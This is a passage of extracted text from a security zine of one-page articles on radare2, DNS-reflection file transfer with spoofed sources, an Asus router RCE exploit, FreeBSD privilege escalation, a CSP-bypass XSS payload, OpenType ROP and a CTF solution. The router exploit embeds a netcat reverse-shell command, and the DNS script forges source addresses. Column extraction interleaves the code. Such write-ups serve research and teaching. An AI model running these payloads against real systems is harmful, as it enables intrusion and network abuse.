itives%20-%20Evolution.pdf [3]http://www.alex-ionescu.com/?p=97 twitter.com/mphx2 BRUNO GONÇALVES DE OLIVEIRA github.com/bmphx2 54 SAA-ALL 0.0.5 MOV your Exploit Development Workflow to [r2land] Sec/Hack MOV your Exploit Development Workflow to [r2land] [Intro]> checksec.sh, metasploit’s pattern_create & pattern_offset, file, readelf, ropgadget, gdb-peda...if you want to reduce the amount of tools for your exploit development workflow – move to the radare2 framework. [Executable File Information]> / File and security attributes iI \ Checksec i~pic,canary,nx,crypto,stripped,static,relocs / Show entry point ieq | Show imports ii | Show exports iE | Show strings iz | Get address of func@plt ?v sym.imp. / Show sections iS \ Grep section permissions iS~ [Debugging/Analysis]> / Debug binary $ r2 -d / Auto analysis of binary aaa ; Usually performed as first command | Print disassembly pdf @ [Memory Analysis]> / Search for string "/ / Memory telescoping pxr @ / Show memory maps dm ; Needs to be in debug mode | Show map of heap dmh \ List loaded modules dmm [Exploitation]> / Print de-bruijn pattern $ ragg2 -P / Search for ROP gadgets /R / Assemble asm instructions $ rasm2 -a Jannis Kirschner twitter.com/xorkiwi SAA-ALL 0.0.5 55 Sec/Hack DNS Reflection done right This example Python code can be used to send a file to DNS Reflection another computer, omitting a direct connection between these 2 machines. This is achieved by splitting done right it to 60 byte chunks (maximum length of a single domain) and using DNS Reflection technique to deliver packets. Domain Name System is almost as old as the internet. Use it for educational purposes only, in networks that Its specific architecture makes it a good abuse point for you own. Don’t stress the DNS servers! Remember that the attackers. In this short paper I will describe what is this can piss off your internet provider, so use with DNS Reflection, why malicious actors tend to use it and caution. why you might want to use it. Sender code: Let’s imagine a server behind a firewall that restricts the #!/usr/bin/python3 traffic only to Linux package repository and DNS servers. from kamene . all import * That means the packets sent from attacker’s computer import base64 , time , sys will not reach victim server and vice versa. To send the packet to the server, we need to spoof the source dnsaddr = "2620:119:35::35" # OpenDNS as an example address of the IP packet, so the firewall will “think” that send_delay = 0.8 the packet was sent from an allowed address. def send_packet ( ip , packet_data ): encoded_message = Why attackers reflect through DNS servers? Good ↪base64 . b64encode ( packet_data . encode ( 'ascii' )) + b '-' reason is traffic amplification, which could further encoded_message_size = len ( encoded_message ) increase impact of the DoS attacks, by making use of for i in range ( 0 , encoded_message_size , 60 ): fact that the DNS responses tend to be larger than DNS data = encoded_message [ i : i + 60 ] requests. The reflection is possible due to the fact that DNSpacket = IPv6 ( dst = dnsaddr , Domain Name System by default uses the UDP layer, ↪src = ip ) / UDP ( sport = RandShort ()) / DNS ( id = 1337 , rd = 0 , z = 0 , ↪tc = 1 , qd = DNSQR ( qname = data , qtype = "A" , qclass = "IN" )) which is connectionless. Another thing is that the DNS is send ( DNSpacket , verbose = 0 ) probably the last protocol you would block in your time . sleep ( send_delay ) firewall. if len ( sys . argv ) < 3 : print ( f '{sys.argv[0]} receiver_ipv6_addr data_file' ) sys . exit () send_packet ( sys . argv [ 1 ], open ( sys . argv [ 2 ]). read ()) Receiver code: #!/usr/bin/python3 import logging logging . getLogger ( "scapy.runtime" ). setLevel ( logging . ERROR ) from kamene . all import * import base64 , sys def receive_packet ( listen_iface ): data = bytearray () while not b '-' in data : DNSPacket = sniff ( iface = listen_iface , filter = "src port 53" , Illustrated DNS Amplification attack ( black arrows) ↪count = 1 ) Communication over DNS ( blue and black arrows) if ( DNSPacket [ 0 ]. haslayer ( DNS ) ) and ( DNSPacket [ 0 ]. getlayer ( DNS ). id == 1337 ): Why you would use DNS Reflection? Assume that you data + = ( DNSPacket [ 0 ]. getlayer ( DNS ). qd . qname [: - 1 ]) want to communicate to the mentioned server, and you print ( base64 . b64decode ( data [: - 1 ]). decode ( 'ascii' ), end = '' ) want a response back from it. A good example can be a remote shell ;). There is an easier and more common if len ( sys . argv ) < 2 : print ( f '{sys.argv[0]} listen_interface' ) solution with creating your own DNS server, then sys . exit () communicating through fake queries. This is a good receive_packet ( sys . argv [ 1 ]) method, but I want to show you a way which does not require you to setup any network infrastructure. You External links: https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/ just need to have IPv6 enabled to simplify things up, https://kamene.readthedocs.io/en/latest/introduction.html#about-scapy due to it’s direct connection nature (there is no NAT). https://github.com/srakai Srakai 56 SAA-ALL 0.0.5 The Router Security Is Decadent and Depraved Sec/Hack The Router Security Is riddle % ropper -I 0x00008000 -b 00 -f httpd ... Decadent and Depraved 0 gadgets found by Igor Chervatyuk There is nothing in the world more helpless and Let's consider our options for a minute: irresponsible and depraved than a man looking in the 1) No eavesdrop on stack addresses and searching for 3 depths of a router security, and at some point last year another vulnerability makes Johnny a dull boy ; my colleague and I jumped into that rotten stuff with 2) No jumping to shell code for this overflow since non- moderate success. We found and reported three executable stack is a thing for at least two hundred vulnerabilities to Asus for home-purpose wireless years. Flag restrictions and length of 500-something routers and one of them lead to remote code execution bytes prior to PC overwrite does not make things any for unauthenticated attacker. Buy the ticket, take the easier; ride, this is CVE-2018-88791. 3) No ROP-chain since it requires multiple null-bytes. The approach to look for vulnerabilities was as simple At this point one should start thinking where did life as possible, dumping names of all the available files in gone sideways, counting dubious life choices starting web-server directory and running through them in from high school and considering more accessible order to find out pages accessible from web without career of a village fool. However, no trick – no article. authentication. Among the other there was one, ironically, related to parental control and content Turns out if we scroll the stack after the crash long filtering. Page was created in a way, that information enough we find HTTP-request headers. Each header is printed on the screen are passed using URL parameters. parsed by firmware separately and each header can end There was three of them: mac, flag and cat_id. Shoving with its own fancy, shiny null-byte. This could be used multiple "A"s into one of them resulted with nothing. as return address. Fortunately, there actually are some Except, according to the internal log, HTTPd daemon gadgets allows us to slightly adjust stack register and crashed and restarted each time I sent large malformed change PC to align with these headers! Header ROP- 4 input, looking for a slight sign of malfunction. chain I guess? Here, have some exploit code . #!/usr/bin/python Attaching GDB to process showed that was really a import struct, urllib3 classic textbook generic buffer overflow, except it had a # 00019294 add sp,sp,#0x800; pop {r4, r5, r6, r7, pc}; lot of restrictions. URL parameters are parsed by means of web-server and, prior to overflow, mangled # 0003cea4 cpy r0,sp according to used parameter. For instance, 'mac' # 0003cea8 bl system parameter expects string delimited with colons. Most cmd = 'nc 192.168.0.2 4444 -e /bin/sh' promising parameter ‘flag’ was mangling input too. If cmd = ';' + cmd + ';' we passed capital "A"s to the parameter it would align = "A" * 199 2 payload = "A" * 532 overwrite PC register with 0x61616160 . In addition to payload += struct.pack(" Igor Chervatyuk [email protected] https://github.com/outofhere SAA-TIP 0.0.5 57 Sec/Hack PIDU - Process Injection and Dumping Utility PIDU - Process Injection and Dumping Utility #!/bin/bash # Process Injection and Dumping Utility, created by reenz0h years ago :) # TW: @sektor7net # README: # Imagine you want to change a process running in a memory, but you don’t have gdb at # hand. GNU/Linux is a flexible OS with (almost) everything-is-a-file philosophy. One of # its cool features is procfs, giving the user access to processes’ kernel structures via # a pseudo-filesystem. There are 2 files that expose both data and metadata of a process: # /proc/ @sektor7net reenz0h https://blog.sektor7.net 58 SAA-TIP 0.0.5 Exploiting FreeBSD-SA-19:02.fd Sec/Hack Exploiting FreeBSD-SA-19:02.fd Karsten K¨onig of Secfault Security 1 Introduction descriptor with another file the user should not be able to write to. 5. FreeBSD 12.0 introduced a vulnerability in the handling If a file is opened writable, a flag in the struct file 1 of file descriptors . The advisory stated that it would al- is set to indicate this. This is only possible if the user low to escalate privileges to root or to escape a FreeBSD has the correct access privileges for the file. The write() jail. This note catches up on the general scenario that syscall will only check this flag to assert that the file was created by this bug and introduces a novel tech- referenced by the descriptor is writable. nique to delay writes in the FreeBSD kernel to create a After performing this check, the syscall will eventually TOCTOU-like exploit in order to escalate to root. call the function bwillwrite () before the actual write op- eration happens on the file system. bwillwrite () will put the kernel to sleep without timeout if there are 2 The Bug Class too many dirty–that is unwritten–buffers. This cre- ates a TOCTOU-like race condition if the attacker is Without going into the details, the scenario created by able to exchange the struct file during this sleep be- the kind of bugs as in the advisory shall be explained. cause the kernel will not check again if the file is opened The bug consisted of an overflow of the reference writable. The use-after-free primitive introduced by the counter variable f count in the C-struct struct file mentioned vulnerability makes this possible. which is used to manage file operations. The variable is Therefore any file, even if the attacker is only able to used to count file descriptors which reference the struct. open it read-only, will be written to in this scenario. If the attacker is able to wrap the counter back to To trigger the sleep in the kernel, a lot of file streams 1, while actually holding more than one file descriptor are opened via fopen() in multiple processes with multi- to the struct file object, this can lead to a user-after- ple threads. After each call to fopen(), the correspond- free situation: By closing one descriptor after the wrap, ing file is unlinked. When all streams are open, a signal the struct is freed by the kernel2 while the other file is given to start a write to these in parallel. This will descriptors still reference the freed struct on the heap. create a lot of dirty buffers really fast. In the special case of FreeBSD, the struct is freed to If the write to an attacker-writable file happens at the Files allocator zone3. Therefore, the bug only al- that moment, bwillwrite () will delay the write opera- lows for dangling references to other objects in this zone. tion. This renders the race condition exploitable com- For example, by opening another file after the free () op- bined with a use-after-free for struct file objects. For eration, an attacker could use the dangling file descrip- example, the user could trigger the bug and open the tors to write to the newly opened file (even though the read-only file libmap.conf to gain root like kcope did descriptors previously pointed to a different file). 6 in 2005 . 3 Way to Exploitation 4 Conclusion & Challenges Exploiting this for a privilege escalation was a bit tricky. This concludes the note. It appeals elegant that a way It was not easily possible to turn this bug into a mem- was found to exploit use-after-free bugs for struct file ory corruption issue that could be exploited via ROP or 4 objects in FreeBSD in general. other techniques in a way fail0verflow did for the PS4 . However, the most urgent challenge is to create a more This is due to the fact that other as in the PS4 scenario, universal exploit as the delay technique only works with the f data pointer of the struct file is not corrupted in UFS at the moment but ZFS is nowadays widely adopted this case. on FreeBSD installations. However, it is possible to start a write to a user-owned A more detailed write-up for the interested reader and file, wait until after all required checks are performed a full exploit for the advisory is available7. and then exchange the file referenced by the used file If you want to get in touch, feel free: @gr4yf0x at 1https://www.freebsd.org/security/advisories/ Twitter or [email protected]. FreeBSD-SA-19:02.fd.asc 2https://ruxcon.org.au/assets/2016/slides/ 5Jann Horn used a similar approach in 2016 https://bugs. ruxcon2016-Vitaly.pdf chromium.org/p/project-zero/issues/detail?id=808 3http://phrack.org/issues/66/8.html 6https://www.exploit-db.com/exploits/1230 4https://fail0verflow.com/blog/2017/ 7https://secfault-security.com/blog/FreeBSD-SA-1902.fd. ps4-namedobj-exploit/ html 1 Karsten König Twitter: @gr4yf0x WTFPL 59 Sec/Hack Semantic gap HAL keeps UEFI Runtime function pointer table at Semantic gap hal!HalEfiRuntimeServicesBlock. by Honorary_BoT Those functions can be triggered from user mode, for instance by launching “System information”, which would trigger reading a UEFI variable. The other day I was walking. Walking page tables of course. On Windows. On Intel x64 CPU. The good news is if you use Microsoft Surface devices, you’re fine, since MSFT firmware assigns Every time I try to exploit something, I avoid using protection to UEFI modules. Good job, Microsoft! known gadgets or techniques. Instead, I prefer Besides that, some drivers create custom getting to know the execution environment, like allocations as RWX, which is inevitable, I guess. But what is there in the address space, which properties not for function, which has an it has and so on. I am also lazy, so I look for the MmMapIoSpace easiest way possible. interesting behavior. Check out the prototypes: PVOID MmMapIoSpace(PHYSICAL_ADDRESS I needed an RWX memory in the kernel. I was aware PhysicalAddress, SIZE_T NumberOfBytes, that Microsoft does a really good job with MEMORY_CACHING_TYPE CacheType); mitigations and was not expecting any. But anyway, I decided to scan Windows page tables. PVOID MmMapIoSpaceEx(PHYSICAL_ADDRESS PhysicalAddress, SIZE_T NumberOfBytes, I was not using any specifics of the Windows ULONG Protect); memory manager, I skipped Software PTEs. My idea was doing it in a hardware way: if the page has a P The first one is a legacy one, the “Ex” one is only available on Windows 10. Third party drivers would bit set in PTE, then the mapping is there, no matter use the old one. There is an implicit mapping what semantics Windows puts on that memory. between specified caching type and protection: I used PulseDbg, a hypervisor-based debugger for MmNonCached converted to RWX that. This way ensures the OS to be frozen and not • modifying the page tables on the fly. For the • MmCached converted to RWX scanning process itself refer to the Offzone 2019 • MmWriteCombined converted to RW presentation “(Mis)configuring page tables”1 or, even better, to the Intel Software Developers So, the driver must decide if it wants backward Manual (Vol 3, Chapter 4), it has all the details. In compatibility, or a fine-grained protection of the fact, SDM has everything, so always refer it. I also mapping. would suggest for you to read it before you go to bed. The good news again is there is a Virtualization- Based Security. Virtual secure mode uses hardware Surprise! Windows kernel does have RWX regions virtualization features for security and protection of of memory. In my case it was Windows 10 1809. Windows 10. It has a W^X enforcement in EPT – And an Intel Haswell CPU on a Gigabyte Q87 chipset extended page tables, controlled by the hypervisor. motherboard, let me explain why it matters. It does not allow guest kernel memory to be both writable and executable at the same time. If you’re The first thing I identified was an area with UEFI concerned about your Windows security, you Runtime services being mapped as RWX. It is should definitely turn VBS on. because the firmware typically doesn’t set the protection on loaded modules. And Windows is not There are more RWX regions present in the kernel. aware of the semantics of the firmware loader. The If you’re interested, then take a walk. On page only option for the OS is to rely on the firmware for tables, of course. those services to work. 1. https://offzone.moscow/report/mis-configuring-page-tables/ Twitter: @honorary_bot Artem Shishkin 60 CC BY 4.0 Using Binary Ninja to find format string vulns in Binary Ninja Sec/Hack Using Binary Ninja to find format string vulns in Binary Ninja 1 Motivation It is very important that we find these custom While targeting a bug bounty program, my fuzzer printf-like functions, because the compiler won’t found a format string vulnerability. output a warning when calling them without a You mean you found a format string vuln string literal (as would be the case for known func- in 2019? YUP! tions like printf), making them more likely to be Surely not exploitable right? Aaahhhh, vulnerable. it was! The binary wasn’t compiled with FOR- 2. If the origin is a constant and read-only TIFY SOURCE or PIE, and even though it was address, we mark the call as safe. a one-shot exploit, with some tricks I was able to 3. If the origin is the result of a known get quite a reliable exploit (∼90% reliability). Un- safe function call we also mark the call as fortunately I’m not able to share more details yet. safe. In this list we have all functions from After this finding, I wanted to look for similar the gettext family, which attempt to translate a vulnerabilities, and so I decided to create a plugin text string into the user’s native language. If we in Binary Ninja to find format string vulns stati- were able to control the translation files (located cally. in /usr/share/locale/ jofra https://github.com/Vasco-jofra/format-string-finder-binja SAA-ALL 0.0.5 61 Sec/Hack Injecting HTML: Beyond XSS Injecting HTML: Beyond XSS Lets take a look at this example web app: Your search is This functionality mirrors some of what you may see in modern templated web apps. Some privileged template is stored on the page, then its content is processed and turned into HTML. In this case it will read the content of the HTML element with id "template", executes anything within the {{ mustache }} brackets, and then renders the result in a separate element. The second feature of this app is to print a URL parameter on the page. This introduces a vulnerability that would normally lead to XSS due to injected HTML tags. However the presence of the Content-Security-Policy prevents an attacker from executing JavaScript. Since we cannot run JavaScript directly, lets see what other strange things can be accomplished. Potentially we may want to force the page to run our own template, since this would allow us to use the eval function. It might be tempting to try and provide our own element with id="template". However HTML ids are unique, so document.getElementById(’template’) will only select the first element and not our injected one. So what do we do? Turns out browsers are often very inconsistent, so it is always better to check our assump- tions. Lets try every tag just to be sure. Here we have a jinja2 page that will render a set of tags: When we run this we get a strange outcome: the selected tag is an tag and not the original It appears that the injected tag has been moved to the top of the page. (This trick even works in all major browsers!) Now getElementById(’template’) will reference our injected data rather than the original element. At this point we can run our own templates and easily get JavaScript code execution: ?q={{ alert("xss") }} So due to a browser quirk we managed to bypass the CSP and achieve XSS! Try it out on this challenge.1 1http://xss.stackchk.fail/ https://twitter.com/itszn13 Amy Burnett 62 SAA-TIP 0.0.5 Building ROP with floats and OpenType Sec/Hack Building ROP with Zero, infinity and NaN Binary zero is the same as a floating point 0.0, while floats and OpenType 0x80000000 can be created by negating it. Infinity is represented by exponent = 128 (let’s call it e, calculated by Mateusz Jurczyk (j00ru) as the encoded e minus 127) and mantissa =0(m in short), which corresponds to 0x7f800000 for inf and Background 0xff800000 for -inf. They can be created with a simple The Adobe Font Development Kit for OpenType is a font expression: processing engine dating back to at least 2000. It is 1 written in C, and was open-sourced by Adobe in 2014 ± 0 on GitHub1. It became an attack surface when parts of Basic quiet NaN, which has the values of 0x7fc00000 AFDKO were included in Microsoft DirectWrite starting 22 and 0xffc00000 (e = 128, m = 2 , sign controlled), is with Windows 10 1709, to facilitate the printing of so- generated similarly: called variable fonts (e.g. in web browsers). This year, I reported a number of bugs in the library, 0 with the 10 most severe ones being fixed by Microsoft ± 2 0 in the July 2019 Patch Tuesday . Many of them were All other NaNs between 0x7f800001-0x7fffffff convenient for exploitation, due to the software stor- and 0xff800001-0xffffffff cannot be generated us- ing the CharString execution context in a giant t2cCtx ing floating point arithmetic. One has to accept it when structure on the stack. Some of the primitives allowed crafting a ROP chain in the AFDKO environment. controlled out-of-bounds writes, making it possible to /GS skip the cookie and overwrite the return address di- Real numbers rectly. Furthermore, we could perform arbitrary arith- metic operations such as multiplication or division in Encoding most values in the 32-bit integer range can the OpenType “virtual machine”. The only problem be achieved as follows. The first number pushed on was – all calculations were performed on 32-bit floats the stack is used to set up the sign bit and 23 bits of (afdko/c/public/lib/source/t2cstr/t2cstr.c): mantissa. For 0xdeadc0de, we’d use −22240.43359375 (0xA91F’9100 as Fixed16.16), which is represented as struct /* Operand stack */ 0xc6adc0de in binary. At this point, the only innacu- { rate part is the exponent, currently equal to 14 (encoded long cnt; float array[CFF2_MAX_OP_STACK]; as 14 + 127 = 141), with an intended value of 62. It can be manipulated by multiplying and dividing the value [...] n } stack; by 2 , for 0 ≤ n ≤ 14 in our case, because of the 16.16 encoding and one bit reserved for sign. In summary, the Moreover, data could be pushed on the stack by op- 0xdeadc0de dword can be constructed by implementing code 255, which loads a 32-bit integer from the Open- the following expression in an OpenType charstring: Type program stream and converts it from an assumed 14 3 6 16.16 fixed point value to a float: −22240.43359375 ∗ (2 ) ∗ 2 The above scheme works for all canonical numbers, long value; i.e. floating points with exponent =6 −127 (0x00800000- CHKSUBRBYTE(h); 0x7f7fffff 0x80800000 0xff7fffff value = *next++; and - ). The only CHKSUBRBYTE(h); other corner case to consider are denormalized numbers value = value << 8 | *next++; (when e = −127). They are smaller than normal num- [...] bers, and are interpreted differently in that they don’t PUSH(value / 65536.0); have an implicit leading 1. Instead of adding extra logic to handle them in my converter, I decided to “cheat” The most basic element of a ROP chain are constant and solve the problem for a bigger value: values, e.g. fixed function arguments. The question is – how to construct a float with a given binary represen- 14 Convert(2 ∗ xdenormal) tation, provided the above capabilities? Let’s recap the Convert(xdenormal)= 214 format of IEEE-754 single precision numbers: After a maximum of two recursive calls, the argument 31 0 becomes a normal number and can be handled using the regular logic described above. Exponent (8 bits) Mantissa (23 bits) The converter is available on GitHub3, and produces Sign (1 bit) charstrings accepted by the FontTools ttx (de)compiler4. Happy hacking! 1https://github.com/adobe-type-tools/afdko 3https://j00ru.vexillium.org/int to float opentype 2https://twitter.com/j00ru/status/1148883124463505408 4https://github.com/fonttools/fonttools Mateusz Jurczyk Blog: https://j00ru.vexillium.org/ Twitter: https://twitter.com/j00ru SAA-ALL 0.0.5 GitHub: https://github.com/j00ru 63 Sec/Hack Scrambled: Rubik's Cube based steganography Scrambled: Rubik's Cube based Step 0: Write some helper methods steganography (from UTCTF 19) import math, random nums = {0:('L', 'F'), 1:('R', 'B'), 2:('U', 'L2'), 3:('D', 'R2'), 4:('F2', 'U2'), 5:('B2', 'D2'), Disclaimer: I wrote this problem for UT CTF, but I did not come up 6:('L\'', 'F\''), 7:('R\'', 'U\''), 8:('B\'', 'D\'')} with the idea (I’m not that smart). This entire system was proposed in moves = {'L':0, 'F':0, 'R':1, 'B':1, 'U':2, 'L2':2, the paper ‘Rubikstega: A Novel Noiseless Steganography Method in 1 'D':3, 'R2':3, 'F2':4, 'U2':4, 'B2':5, 'D2':5, Rubik’s Cube’ , and I just implemented it. 'L\'':6, 'F\'':6, 'R\'':7, 'U\'':7, 'B\'':8, 'D\'':8} Prompt shuffleNums = dict() # Convert a base 9 number to a string B2 R U F' R' L' B B2 L F D D' R' F2 D' R R D2 B' L R def nineToStr(nine): return decToStr(int(str(nine), 9)) L' L B F2 R2 F2 R' L F' B' R D' D' F U2 B' U U D' U2 F' # Convert a decimal number to a string def decToStr(dec): L F' F2 R B R R F2 F' R2 D F' U L U' U' U F D F2 U R return bytes.fromhex(hex(dec).replace('L', U' F U B2 B U2 D B F2 D2 L2 L2 B' F' D' L2 D U2 U2 D2 '')[2:]).decode('utf-8') U B' F D R2 U2 R' B' F2 D' D B' U B' D B' F' U' R U U' # Convert scramble notation to base 9 L' L' U2 F2 R R F L2 B2 L2 B B' D R R' U L def scrambleToNine(scramble, dict): Have fun! if dict: result = ''.join(str(shuffleNums[moves[move]]) for move in Solution scramble.split()) else: result = ''.join(str(moves[move]) for move in Since I made the problem, I'm going to cheat a little and scramble.split()) use my God-like problem-writer powers to determine return result that the problem has to do with Rubikstega (for those not so clairvoyantly inclined, 'Rubikstega' was released Step 1: Decode the permutation header as a hint later on in the CTF). Rubikstega is a def decodePerm(head): steganography system that used Rubik's cube scramble decoded = str(int(str(scrambleToNine(head, 0)), 9)) notation to encode the data. There are 18 notations for shuffle = list(decoded[int(decoded[0]) + 1 : Rubik’s Cube scrambles, but in Rubikstega they’re int(decoded[0]) + 1 + 9]) for key in shuffle: shuffleNums[int(key)] = grouped into 9 pairs. There’s a default encoding table that maps the numbers 0-8 to a pair of notations, and shuffle.index(key) one of the notations from the pair is randomly chosen to represent that number. To encode a message, you first Step 2: Decode the length information generate a permutation of the default encoding table, def decodeLength(head): with 0-8 now mapping to different notation pairs. This decoded = str(int(str(scrambleToNine(head, 1)), 9)) is encoded in the permutation header along with some return decoded[int(decoded[0]) + 2 : int(decoded[0]) + 2 + int(decoded[1])] random padding. To start encoding the message, you convert each character into its binary representation, then concatenate all of them into one large binary Step 3: Decode the message! string. Next you get convert that long binary string to def decode(cipher): base 9, and use the permuted encoding table to convert scrambles = cipher.split(',') the base 9 digits to scramble notation. Once the decodePerm(scrambles[0]) encoded = ''.join(scrambles[2:]) message is encoded, you make the length header by combining the length of the encoded message with decoded = nineToStr(str(scrambleToNine(encoded, 1))[:int(decodeLength(scrambles[1]))]) more random padding. The final message is the return decoded permutation header, length header and finally the actual message. My explanation glossed over quite a few Add in a main method to get input and call decode() , details, so if you're interested in the specifics you should check the paper. Now, in order to decode, you just do pass in the 3 scrambles from the prompt, and we get those steps in reverse: the decoded message: utflag{my_bra1n_1s_scrambl3d}! 1http://informatika.stei.itb.ac.id/~rinaldi.munir/TA/Makalah_TA_ Ade_Yusuf.pdf github.com/alex-bellon/rubikstega Alex Bellon alex-bellon.com 64 SAA-ALL 0.0.5 Rsync - the new cp SysAdmin Rsync - the new cp 3.1 Archive mode The first and one of the most important options is the archive mode enabled by -a (which is in fact a combi- nation of a few other flags). This flag enables recursive 1 Introduction copying as well as preserves most of file attributes like owner (only when run as a superuser), group (requires For everyone who is still before or during their transition superuser if you don’t belong to the group) or permis- to fully automatic full-blown CI/CD pipelines, you may sions. When copying to remote, by default user/group often find yourself copying lots of files, not only on a names are used, but you can change that behavior to local machine, but also between servers. use uid/gid instead. While for many simple use cases cp will be enough, you may often find yourself looking for some additional 3.2 Remote sync features that cp is not capable of. Not to look far, copy- Synchronization between remote machines is a feature ing to or from remote machines is a really common task which doesn’t require any additional flags. You can which is beyond powers of cp. The next missing fea- move files both ways, that is from remote to local and ture is tracking copying progress which is useful while vice versa. By default you cannot copy from remote transferring large files. 2 to remote but there are ways to achieve this . Sample So what can we do with it? As you may have al- command transferring to remote: ready guessed there is a way to overcome these issues and rsync is our savior. As its manual1 suggests it’s a $ cp file bsadel@remote:/home/bsadel/ fast and versatile file-copying tool. It allows us to syn- Remembering that rsync uses ssh we can leverage its chronize files not only locally but also between remote config file to use our server aliases and default users. machines. It has a lot of useful options, that should Host my−host satisfy almost everyone. HostName 172.39.14.124 User bsadel 2 Setup Listing 2: ”.ssh/config” With such a file you can simply copy it without the We can install it simply by calling the following com- need to specify the username or any other things like mand on ubuntu (or a similar command on other sys- non-default ssh key. tems). $ cp file my−host:/home/bsadel/ $ sudo apt−get install rsync 3.3 Progress indicator Next we can modify our .bash_aliases file by adding the following line. In this example we are overriding the rsync supports two ways of showing progress. Ei- default copying method of our system, but if you wish ther by file (achieved with --progress) or overall (flag to leave cp usable, just change the alias shown below to --info=progress2). To see it in a more pleasant format something, like cpr. you can add -h so that numbers are shown in kilobytes or megabyte instead of raw bytes. alias cp=”rsync −ah −−inplace −−info=progress2” 3.4 In-place copying Listing 1: ”.bash aliases” By default when rsync synchronizes a local file which The last thing you have to do to use your new com- already exists at the final destination it uses an interme- mand is restarting your terminal. Now you can try out diate file. --inplace flag changes that behavior so that if everything is working fine. Just copy a file and check the file is replaced without creation of any additional if you can see the progress printed in your terminal. If artifacts. It’s especially useful when synchronizing large so, you are done! files/directories. 4 More 3 Options For more options and examples look at rsync manual In this section we will review some of the most popular page or search for articles like this3 one by Pradeep Ku- rsync options. This will include ones we’ve used in our mar. Also check out Rsync cheetsheet4. alias as well as some additional ones which may come in 2https://backreference.org/2015/02/09/ handy some day. remote-to-remote-data-copy/ 3https://www.linuxtechi.com/rsync-command-examples-linux/ 1https://linux.die.net/man/1/rsync 4https://devhints.io/rsync Bartosz Sądel Twitter: @bartosz_sadel, Blog: https://dcortezmeleth.github.io/ SAA-ALL 0.0.5 65 SysAdmin What to pack for a deserted Linux Island? What to pack for a deserted The Shell Linux Island 麟? I recommend you get the coolest one: Things I insist on installing on every new $ sudo apt install zsh Linux server I work on, and you should too When you launch it for the first time, use the wizard to configure it to your liking. If you don’t configure autocomplete and It’s that time again. You finally manage to ssh into your 3 chdir without cd, you’re wrong. Then get oh-my-zsh (for the brand-new server, aaaand… security-minded folks out there - after reviewing the script of course). $ sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/oh-my- It sucks. You think to yourself, “ah, if only I had time zsh/master/tools/install.sh)" to set this up like I WANT it to be, this machine would’ve been a treat”. But alas; you choose to save time by Don’t forget to add 2-letters-long aliases to the most chugging on with the basic terminal for hours, which end frequently used paths (e.g. source, bin and logs). Super up slowing you down. My point is: Tooling is king. fast cd-ing . Also, random themes are fun. Tooling increases productivity, lowers frustration, and The Terminal(s) makes you look cool. More terminals == more throughput == more productivity == more happiness. That’s just math. Get tmux, oh-my- pro·duc·tiv·i·ty noun; The effectiveness of tmux4,powerline and nerdfonts. productive effort, especially in industry, as measured in terms of the rate of output per unit of input.1 $ sudo apt install tmux $ git clone ℹ Tooling is important where you intend to actually work. If https://github.com/gpakosz/.tmux.git this is a server you just ssh into to restart a crashed service, $ ln -s -f .tmux/.tmux.conf then this guide might be somewhat irrelevant. $ cp .tmux/.tmux.conf.local . So, what do I install the moment I log into a new Linux The Text Editor machine2, as a starter pack of efficiency? Grab your coffee and ssh into your neglected server that wants some love. I could write a whole article on why to use vim. In short, it’s fast and effective. To improve the experience of using First thing first, update your current software. vim: get pathogen (vim package manager) and nerdtree5 to browse files quickly. Map 1https://www.lexico.com/en/definition/productivity 3 https://ohmyz.sh/ 4 https://github.com/gpakosz/.tmux 2 This guide is for Debian-based releases. Make adaptations as 5 https://github.com/scrooloose/nerdtree necessary. 6 https://vimium.github.io/ @ShayNehmad on twitter Shay Nehmad https://github.com/ShayNehmad 66 SAA-ALL 0.0.5